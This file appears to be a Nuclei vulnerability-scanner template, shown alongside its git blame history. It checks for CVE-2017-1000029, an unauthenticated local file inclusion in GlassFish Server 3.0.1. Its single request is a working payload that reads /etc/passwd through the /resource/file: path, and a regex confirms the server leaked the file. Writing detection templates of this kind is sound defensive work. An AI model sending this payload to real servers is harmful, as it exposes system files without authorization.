nuclei-templates/cves/2017/CVE-2017-1000029.yaml

id: CVE-2017-1000029

info:
  name: GlassFish Server Open Source Edition 3.0.1 - LFI
  author: 0x_Akoko
  severity: high
  description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.
  reference:
    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784
    - https://www.cvedetails.com/cve/CVE-2017-1000029
    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2017-1000029
    cwe-id: CWE-200
  tags: cve,cve2017,glassfish,oracle,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/resource/file%3a///etc/passwd/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200
Create CVE-2017-1000029.yaml 2022-04-05 10:33:13 +00:00			`id: CVE-2017-1000029`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00
Create CVE-2017-1000029.yaml 2022-04-05 10:33:13 +00:00			`info:`
			`name: GlassFish Server Open Source Edition 3.0.1 - LFI`
			`author: 0x_Akoko`
			`severity: high`
			`description: Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.`
			`reference:`
			`- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18784`
			`- https://www.cvedetails.com/cve/CVE-2017-1000029`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`- https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2016-011/?fid=8037`
Create CVE-2017-1000029.yaml 2022-04-05 10:33:13 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
Create CVE-2017-1000029.yaml 2022-04-05 10:33:13 +00:00			`cvss-score: 7.5`
			`cve-id: CVE-2017-1000029`
			`cwe-id: CWE-200`
			`tags: cve,cve2017,glassfish,oracle,lfi`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/resource/file%3a///etc/passwd/"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
Update and rename CVE-2017-1000029.yaml to cves/2017/CVE-2017-1000029.yaml 2022-04-05 17:24:06 +00:00			`- "root:[x*]:0:0:"`
Create CVE-2017-1000029.yaml 2022-04-05 10:33:13 +00:00
			`- type: status`
			`status:`
			`- 200`